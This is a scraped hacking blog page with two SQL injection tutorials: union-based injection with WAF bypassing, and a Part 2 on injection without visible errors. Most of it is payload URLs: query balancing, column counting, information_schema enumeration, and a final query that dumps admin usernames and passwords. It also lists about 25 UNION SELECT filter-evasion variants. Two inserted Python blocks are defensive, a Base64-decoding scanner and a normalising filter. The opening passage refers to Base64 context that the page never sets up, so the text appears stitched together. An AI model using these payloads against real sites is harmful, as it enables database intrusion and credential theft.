<span style="font-size: small;">These parts are basic SQL injection.</span><br />
<span style="font-size: small;">Read my previous SQL injection tutorials:</span><br />
<div style="text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-1.html" target="_blank">SQL Injection- Basics Of SQLi Part-1</a></span></div>
<div style="text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-2_19.html" target="_blank">SQL Injection- Basics Of SQLi Part-2</a></span></div>
<div style="text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/union-based-sql-injection-waf-bypass.html" target="_blank">Union Based SQL Injection (WAF Bypassing)</a></span></div>
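<span style="font-size: small;">The reason the first single quote did nothing is that the server decodes <b>id</b> before it reaches the query, so a filter that looks only at the raw parameter sees harmless Base64. A defender therefore has to decode before inspecting. The following is an added example, not code from this post: a Python scanner that tries to Base64-decode each query parameter and only then checks the plaintext for SQL tokens. The request targets are constructed and mirror the post's <b>detail.php?id=</b> shape; <b>try_base64</b>, <b>scan_target</b> and the token list are assumptions for the example.</span><br />

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Tokens that should never appear in a numeric id once it has been decoded.
# The keywords are the ones the steps above rely on; this is a starting
# point for a filter, not a complete SQL grammar.
SUSPICIOUS_RE = re.compile(
    r"('|--|/\*|#|\bunion\b|\bselect\b|\border\s+by\b|\bgroup\s+by\b)", re.I)


def encode_param(text: str) -> str:
    """Base64 a parameter value the way the application expects it."""
    return base64.b64encode(text.encode()).decode()


def try_base64(value: str):
    """Return the decoded text if value is well-formed Base64 that decodes to
    printable UTF-8, else None. A raw '+' in a query string is turned into a
    space by the query parser, so spaces are mapped back before decoding."""
    value = value.replace(" ", "+")
    if len(value) < 4 or len(value) % 4 != 0:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_target(request_target: str) -> list:
    """Decode every Base64-looking parameter and report the ones whose
    plaintext contains SQL tokens; plain (non-Base64) values are left alone."""
    findings = []
    for name, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        decoded = try_base64(value)
        if decoded is None:
            continue
        hit = SUSPICIOUS_RE.search(decoded)
        if hit:
            findings.append({"param": name, "encoded": value,
                             "decoded": decoded, "token": hit.group(0)})
    return findings


# Constructed request targets; the path mirrors the post's detail.php?id= example.
SAMPLE_TARGETS = [
    "/detail.php?id=" + encode_param("15"),                 # benign: MTU=
    "/detail.php?id=" + encode_param("15'"),                # the single-quote probe
    "/detail.php?id=" + encode_param("15 order by 6-- -"),  # column-counting step
    "/detail.php?id=15",                                    # not Base64 at all
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        print(target, "->", scan_target(target) or "clean")
```

<span style="font-size: small;">The length and padding checks keep ordinary values like <b>id=15</b> from being misread as Base64, and the printable-text check drops binary blobs that happen to decode; the real fix on the application side is still to treat the decoded value as data (an integer here) rather than as part of the SQL text.</span><br />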
<span style="font-size: small;"><b>Union Based SQL Injection (WAF Bypassing)</b> (posted 2015-05-20)</span><div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkxwxTEBNnIaqz-I5Xe5JZGn3Wsy9GGvU12mJoyHeB3q4L7F5UsVlZmsg_hVP1XS-mC1e07T8B7wdb9Qyh-eYQtjW3VI1EenezGFVHu-eR_CTK1q971ZrO3nwaLFeFgAZv6sJWw4Imcqg/s1600/ew.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkxwxTEBNnIaqz-I5Xe5JZGn3Wsy9GGvU12mJoyHeB3q4L7F5UsVlZmsg_hVP1XS-mC1e07T8B7wdb9Qyh-eYQtjW3VI1EenezGFVHu-eR_CTK1q971ZrO3nwaLFeFgAZv6sJWw4Imcqg/s1600/ew.jpg" /></a></span></div>
<span style="font-size: small;"> </span><br />
<span style="font-size: small;">After our tutorial on the basics of SQL injection:</span><br />
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-1.html" target="_blank">SQL Injection- Basics Of SQLi Part-1</a></span><br />
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-2_19.html" target="_blank">SQL Injection- Basics Of SQLi Part-2</a></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Union based SQL injection + WAF Bypassing</b> <b>By RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Today I am going to discuss Union based SQL injection and WAF bypassing techniques.</span><br />
<span style="font-size: small;">Let's start injecting.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here is our target.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11</b></span><br />
<span style="font-size: small;">Add a single quote (') at the end of the URL.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11' </b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyysNuBcZnLBg7y4hFYtW2pb7Mn1XZye66_psQW2AYuiVNjKelDhD_0VxktOWohUnDwQNsRIKu2bu53SIPgO58JTmpgHBYBsSMWqVQb47TW41WFobLnGIChtTEhx4WPJ-fc428CiZQ9THZ/s1600/ada.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Union Based SQL Injection (WAF Bypassing)" border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyysNuBcZnLBg7y4hFYtW2pb7Mn1XZye66_psQW2AYuiVNjKelDhD_0VxktOWohUnDwQNsRIKu2bu53SIPgO58JTmpgHBYBsSMWqVQb47TW41WFobLnGIChtTEhx4WPJ-fc428CiZQ9THZ/s640/ada.png" title="Union Based SQL Injection (WAF Bypassing)" width="640" /></a></span></div>
<span style="font-size: small;">The page returns a MySQL error, so our parameter reaches the query unescaped.</span><br />
<span style="font-size: small;">Let's balance the query for further injection by commenting out whatever follows our input. These are the comment sequences from our previous tutorials (<b>--+</b> is <b>--</b> followed by a URL-encoded space, which MySQL requires after the two dashes; <b>%23</b> is a URL-encoded <b>#</b>):</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11--</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11-- - </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11%23</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11;</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here is a short explanation of balancing and comments in our injection:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvG7LVRIqsOd0aQd_MqCpMrYsJPEnlze0hB5lXDa1SAX8d7QR4QmTbOiWKbA8Dh0mIwfdbuCn28KyCERTtlFJtaSm5EGE9LwuTr2Dwo2g554RL_y_k3WySD5zTgh2LOJambJ04hv7DK-C-/s1600/bb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Union Based SQL Injection (WAF Bypassing)" border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvG7LVRIqsOd0aQd_MqCpMrYsJPEnlze0hB5lXDa1SAX8d7QR4QmTbOiWKbA8Dh0mIwfdbuCn28KyCERTtlFJtaSm5EGE9LwuTr2Dwo2g554RL_y_k3WySD5zTgh2LOJambJ04hv7DK-C-/s400/bb.jpg" title="Union Based SQL Injection (WAF Bypassing)" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After balancing the query, the next step is to count the columns of the original SELECT with ORDER BY, raising the column index until MySQL complains:</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 order by 1--+</b></span><br />
<span style="font-size: small;">No error.</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 order by 3--+</b></span><br />
<span style="font-size: small;">No error.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 order by 5--+</b></span><br />
<span style="font-size: small;">Again no error.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 order by 6--+</b></span><br />
<span style="font-size: small;">Here we get an error:</span><br />
<span style="font-size: small;">Unknown column '6' in 'order clause'</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">So the original query selects 5 columns. Now let's find the vulnerable columns, the ones whose value the page actually prints. The negative id makes the original WHERE clause match nothing, so only our UNION row is displayed and the numbers mark the printed columns:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">If the target site is protected by a WAF, the request is blocked before it reaches the database and we get a mod_security error page instead of the column markers.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here are some WAF bypassing variants of <b>UNION SELECT</b>:</span><br />
<ul>
<li><span style="font-size: small;"> <b>/*!%55NiOn*/ /*!%53eLEct*/</b></span></li>
<li><span style="font-size: small;"><b> %55nion(%53elect 1,2,3)-- -</b></span></li>
<li><span style="font-size: small;"><b> +union+distinct+select+</b></span></li>
<li><span style="font-size: small;"><b> +union+distinctROW+select+</b></span></li>
<li><span style="font-size: small;"><b> /**//*!12345UNION SELECT*//**/</b></span></li>
<li><span style="font-size: small;"><b> /**//*!50000UNION SELECT*//**/</b></span></li>
<li><span style="font-size: small;"><b> /**/UNION/**//*!50000SELECT*//**/</b></span></li>
<li><span style="font-size: small;"><b> /*!50000UniON SeLeCt*/</b></span></li>
<li><span style="font-size: small;"><b> union /*!50000%53elect*/</b></span></li>
<li><span style="font-size: small;"><b> +#uNiOn+#sEleCt</b></span></li>
<li><span style="font-size: small;"><b> +#1q%0AuNiOn all#qa%0A#%0AsEleCt</b></span></li>
<li><span style="font-size: small;"><b> /*!u%6eion*/ /*!se%6cect*/</b></span></li>
<li><span style="font-size: small;"><b> +un/**/ion+se/**/lect</b></span></li>
<li><span style="font-size: small;"><b> uni%0bon+se%0blect</b></span></li>
<li><span style="font-size: small;"><b> %2f**%2funion%2f**%2fselect</b></span></li>
<li><span style="font-size: small;"><b> union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A</b></span></li>
<li><span style="font-size: small;"><b> REVERSE(noinu)+REVERSE(tceles)</b></span></li>
<li><span style="font-size: small;"><b> /*--*/union/*--*/select/*--*/</b></span></li>
<li><span style="font-size: small;"><b> union (/*!/**/ SeleCT */ 1,2,3)</b></span></li>
<li><span style="font-size: small;"><b> /*!union*/+/*!select*/</b></span></li>
<li><span style="font-size: small;"><b> union+/*!select*/</b></span></li>
<li><span style="font-size: small;"><b> /**/union/**/select/**/</b></span></li>
<li><span style="font-size: small;"><b> /**/uNIon/**/sEleCt/**/</b></span></li>
<li><span style="font-size: small;"><b> /**//*!union*//**//*!select*//**/</b></span></li>
<li><span style="font-size: small;"><b> /*!uNIOn*/ /*!SelECt*/</b></span></li>
</ul>
<span style="font-size: small;">Just replace <b>Union Select</b> in the query with one of these variants. They all live in the gap between what the filter matches and what the MySQL lexer accepts: <b>/*!50000...*/</b> is a version comment whose body MySQL executes when the server is version 5.0.0 or newer (the WAF sees a comment, the database sees a keyword), an empty <b>/**/</b> comment or a <b>%0a</b> newline is plain whitespace to MySQL, <b>#</b> and <b>-- </b> comment out the rest of the line, and <b>%55</b>-style URL encoding is undone by the web server before the query is built. Variants that put a comment inside a keyword (<b>un/**/ion</b>) split it into two tokens on MySQL and will not execute there. Try the variants one at a time and keep the first one that brings back the column markers.</span><br />
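<span style="font-size: small;">Why these variants slip past a keyword signature, as an added Python example that is not part of the original post: a naive filter that looks for <b>union select</b> in the decoded query string is run side by side with a filter that first normalises the request the way MySQL's lexer will read it (URL decoding, version comments, ordinary comments, line comments, whitespace). Both filters are constructed for this illustration and are not mod_security rules; the payloads are copied from the list above.</span><br />

```python
"""Added example, not from the original post: the UNION SELECT variants listed
above against two constructed filters. naive_blocks() matches the literal
keywords; normalised_blocks() first reduces the request to what MySQL's lexer
will actually read. Neither is a real mod_security rule."""
import re
from urllib.parse import unquote_plus

# Payloads copied from the list above, as they travel in the URL.
BYPASSES = [
    "/*!%55NiOn*/ /*!%53eLEct*/",
    "%55nion(%53elect 1,2,3)-- -",
    "+union+distinct+select+",
    "+union+distinctROW+select+",
    "/**//*!50000UNION SELECT*//**/",
    "+#1q%0AuNiOn all#qa%0A#%0AsEleCt",
    "/*!u%6eion*/ /*!se%6cect*/",
    "%2f**%2funion%2f**%2fselect",
    "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A",
    "/*--*/union/*--*/select/*--*/",
    "union+/*!select*/",
]

# Two entries from the same list that put a separator inside a keyword.
# MySQL reads a comment (and a vertical tab) as a token separator, so these
# never become UNION SELECT on MySQL; a filter that mirrors the lexer agrees.
SPLIT_KEYWORDS = ["+un/**/ion+se/**/lect", "uni%0bon+se%0blect"]

NAIVE = re.compile(r"\bunion\s+select\b", re.I)
UNION_SELECT = re.compile(
    r"\bunion\b(\s+(all|distinct|distinctrow))?\s*\(?\s*select\b")


def naive_blocks(raw):
    """Signature WAF: one URL-decoding pass, then the literal keyword pair."""
    return bool(NAIVE.search(unquote_plus(raw)))


def normalise(raw):
    """Reduce a query-string fragment to the tokens MySQL will see:
    - decode %XX twice ('+' is a space), to cover double encoding;
    - /*!50000 ... */ version comments: MySQL executes the body, so keep it;
    - /* ... */ ordinary comments: whitespace to MySQL, so become a space;
    - '#' and '-- ' line comments: dropped to end of line;
    - all remaining whitespace (space, tab, CR, LF, VT, FF) collapsed."""
    s = raw
    for _ in range(2):
        s = unquote_plus(s)
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"(#|--(?=\s|$))[^\r\n]*", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.strip().lower()


def normalised_blocks(raw):
    """Same keyword pair, matched on the normalised form, allowing
    UNION ALL / DISTINCT / DISTINCTROW and a parenthesised SELECT."""
    return bool(UNION_SELECT.search(normalise(raw)))


def evasion_report(payloads):
    """How many of the payloads each filter would have blocked."""
    return {
        "naive": sum(naive_blocks(p) for p in payloads),
        "normalised": sum(normalised_blocks(p) for p in payloads),
    }


if __name__ == "__main__":
    for p in BYPASSES:
        print(f"{p!r:48} -> {normalise(p)!r}")
    print(evasion_report(BYPASSES))
```

<span style="font-size: small;">Every payload in the list evades the naive signature and every one is caught once the request is normalised, which is the general lesson: a filter has to decode and tokenise the input the way the database does, otherwise the attacker picks whichever encoding the filter and the parser disagree on.</span><br />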
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's continue our tutorial.</span><br />
<span style="font-size: small;">To see the vulnerable columns, the original SELECT must return no rows; otherwise the legitimate row is displayed instead of our UNION row. Above we did this with a negative id (<b>-</b>).</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We can also do it with other expressions that make the WHERE clause false or match no row.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here are some of them, with examples:</span><br />
<span style="font-size: small;">Using <b>and 0</b> (the WHERE condition becomes false)</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Using <b>and false</b></span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+ </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Using <b>div 0</b> (integer division by zero yields NULL in MySQL, and <b>id = NULL</b> matches no row)</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+ </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Using <b>null</b></span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+ </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Using <b>.1337</b> (a fractional id that no row has)</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+ </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">The markers of the vulnerable columns are printed on the page. Here 3 is our vulnerable column.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWr2adTwOclpa7p2WPFK6nqVDAruirra5RaFpYsZrK89GnTYj3-Q_1nJNO2ne51qyNNTSmF77FGS53IMc1-kl274_wbGBAqO5Zl_9vYX29rgyLon59-eMvr5DMf9NjxzQlqAOlaVptuu9s/s1600/rr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Union Based SQL Injection (WAF Bypassing)" border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWr2adTwOclpa7p2WPFK6nqVDAruirra5RaFpYsZrK89GnTYj3-Q_1nJNO2ne51qyNNTSmF77FGS53IMc1-kl274_wbGBAqO5Zl_9vYX29rgyLon59-eMvr5DMf9NjxzQlqAOlaVptuu9s/s320/rr.png" title="Union Based SQL Injection (WAF Bypassing)" width="320" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here are some MySQL variables and functions that are useful in the vulnerable column:</span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">@@version = current server version</span><br />
<span style="font-size: small;">@@GLOBAL.VERSION = current server version</span><br />
<span style="font-size: small;">user() = current database user</span><br />
<span style="font-size: small;">database() = current database</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We can see the current version printed on the page.</span><br />
<span style="font-size: small;">The next step is to get the tables of the current database from information_schema:</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now we can see the tables of the current database. concat(table_name) returns one table per row, so if the page renders only the first row, step through them with LIMIT 0,1, LIMIT 1,1 and so on, or use group_concat(table_name) to get all of them in one row.</span><br />
<span style="font-size: small;">Now, if you want the admin details of the target site, note the name of the admin table and list its columns from information_schema.columns.</span><br />
<span style="font-size: small;">Change table_name to column_name, information_schema.tables to information_schema.columns and the table_schema condition to table_name. The table name is supplied as MySQL CHAR(): CHAR(97, 100, 109, 105, 110) is 'admin' spelled in ASCII codes, so the query needs no quotes, which matters when quotes are escaped or filtered. Keeping <b>and table_schema=database()</b> in the WHERE clause as well avoids picking up a same-named table from another database.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select
1,2,concat(column_name),4,5 from information_schema.columns where
table_name=CHAR(97, 100, 109, 105, 110)--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We can see the column names on the page, for example id, username, password.</span><br />
<span style="font-size: small;">To get the data from those columns, here is our final query (0x3a is a colon, used as the separator between the two values):</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select
1,2,concat(username,0x3a,password),4,5 from admin--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Author: Rai Muzammal Hussain a.k.a RAi Jee</b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com7tag:blogger.com,1999:blog-5545325473666478334.post-23995834284057911822015-05-19T08:59:00.000-07:002015-09-19T10:35:42.065-07:00 SQL Injection- Basics Of SQLi Part-2<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUffKu1oLv_vf-Xhn1nJ4qyB1LhHfzqXRGAk9kxUwi8t3zSVSYx8FMUbOiV26SD9muxCaaKGDaVV3yvwdSm0Ad5l-JXtoyBA-jA8gRv_528JasK5uTRy9xrV1RIIpf45hmZptuxDMu8Whu/s1600/hhh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" SQL Injection- Basics Of SQLi Part-2" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUffKu1oLv_vf-Xhn1nJ4qyB1LhHfzqXRGAk9kxUwi8t3zSVSYx8FMUbOiV26SD9muxCaaKGDaVV3yvwdSm0Ad5l-JXtoyBA-jA8gRv_528JasK5uTRy9xrV1RIIpf45hmZptuxDMu8Whu/s1600/hhh.jpg" title=" SQL Injection- Basics Of SQLi Part-2" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-1.html" target="_blank">SQL Injection- Basics Of SQLi Part-1</a> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;">After my first tutorial on the basics of SQL injection, here is the next one.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b>SQL Injection- Basics Of SQLi Part-2 By RAi Jee</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<a name='more'></a><span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;">Usually when we inject a site we just check whether it gives a MySQL error or not, as shown in this picture.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVXykyQzQ4Q1-DyoePEibU9st_Q2IAd5ROvsKvPvHIdMgQdeOg82hPQ9i-npeL_CzE55ae8ZKtkmCKlSJi0PHIETXJdfQrQ4MYRBYd6CiCzAIziBGANqZqb8hRDpKxM8yfy1BLLxNmQrg0/s1600/ss.png" style="margin-left: 1em; margin-right: 1em;"><img alt=" SQL Injection- Basics Of SQLi Part-2" border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVXykyQzQ4Q1-DyoePEibU9st_Q2IAd5ROvsKvPvHIdMgQdeOg82hPQ9i-npeL_CzE55ae8ZKtkmCKlSJi0PHIETXJdfQrQ4MYRBYd6CiCzAIziBGANqZqb8hRDpKxM8yfy1BLLxNmQrg0/s640/ss.png" title=" SQL Injection- Basics Of SQLi Part-2" width="640" /></a> But in some cases we add a single quote (') to the parameter to test for the vulnerability, load the URL, and see no error at all. For example,</span><br />
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We don't get any error, but if we look closely there are small changes in the page. For example:</span><br />
<span style="font-size: small;">Here is the normal page of our target site.</span><br />
<span style="font-size: small;"><b> http://www.fakesite.com/detail.php?id=1</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJWAvjtWsHXxtoih4eZTfsUKp__ImHH7hdExn8HtgWUQyjTJpkrKNGms8nbHvXXXjUWHc2s81pWlmJHcva7RFTjfEv2csQaj8pPgRcbQRMpPrXaqwWYSXJCIvX5qnCUQDcSSJFSX2d08oS/s1600/er.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" SQL Injection- Basics Of SQLi Part-2" border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJWAvjtWsHXxtoih4eZTfsUKp__ImHH7hdExn8HtgWUQyjTJpkrKNGms8nbHvXXXjUWHc2s81pWlmJHcva7RFTjfEv2csQaj8pPgRcbQRMpPrXaqwWYSXJCIvX5qnCUQDcSSJFSX2d08oS/s400/er.png" title=" SQL Injection- Basics Of SQLi Part-2" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1'</b></span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After adding the single quote (') the page gives no error, but some content is missing. The application hides the database error, yet the broken query returns nothing, so everything that came from it disappears. That silent change is our indication of SQL injection.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJuqyjC3uOVWjIbTkyljeJMdgA4YtPnwk_og8finHjF-6-fdAUDHo_dKjIhWGuU2kmVRWY0QDHHyDTG9MrfyLU_35H_6AwlLNK841P2-6xx5h8YFU-Hm2EHCyV5HFO82NQgvvym22Vz8Qq/s1600/fh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" SQL Injection- Basics Of SQLi Part-2" border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJuqyjC3uOVWjIbTkyljeJMdgA4YtPnwk_og8finHjF-6-fdAUDHo_dKjIhWGuU2kmVRWY0QDHHyDTG9MrfyLU_35H_6AwlLNK841P2-6xx5h8YFU-Hm2EHCyV5HFO82NQgvvym22Vz8Qq/s400/fh.png" title=" SQL Injection- Basics Of SQLi Part-2" width="400" /></a></span></div>
<span style="font-size: small;">Now let's try to balance our query, as we learned in our</span><br />
<span style="font-size: small;">first tutorial <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-1.html" target="_blank">SQL Injection- Basics Of SQLi Part-1</a>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1--</b></span><br />
<span style="font-size: small;">The page loads normally. (If plain <b>--</b> does not work, use <b>--+</b>, since MySQL requires whitespace after the two dashes.)</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Use ORDER BY to find the total number of columns:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 order by 1--</b></span><br />
<span style="font-size: small;">The page loads normally.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 order by 3--</b></span><br />
<span style="font-size: small;">Again the page loads normally.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 order by 5--</b></span><br />
<span style="font-size: small;">And here some data is missing from the page, as shown in the picture above: ORDER BY 5 fails because there is no fifth column, and the error is hidden just like it was with the single quote.</span><br />
<span style="font-size: small;">Decrease the column count from 5 to 4.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 order by 4--</b></span><br />
<span style="font-size: small;">The page loads normally, so there are 4 columns in total.</span><br />
<span style="font-size: small;">Now we prepare our UNION-based query. <b>and 0</b> makes the original WHERE clause false, so only our UNION row is displayed:</span><br />
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1 and 0 Union select 1,2,3,4--</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After executing the query you can see the vulnerable columns printed on the web page.</span><br />
<span style="font-size: small;">For further injection, getting tables and columns and then dumping data, you can read this tutorial:</span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/05/union-based-sql-injection-waf-bypass.html" target="_blank">UNION BASED SQL INJECTION</a></span><br />
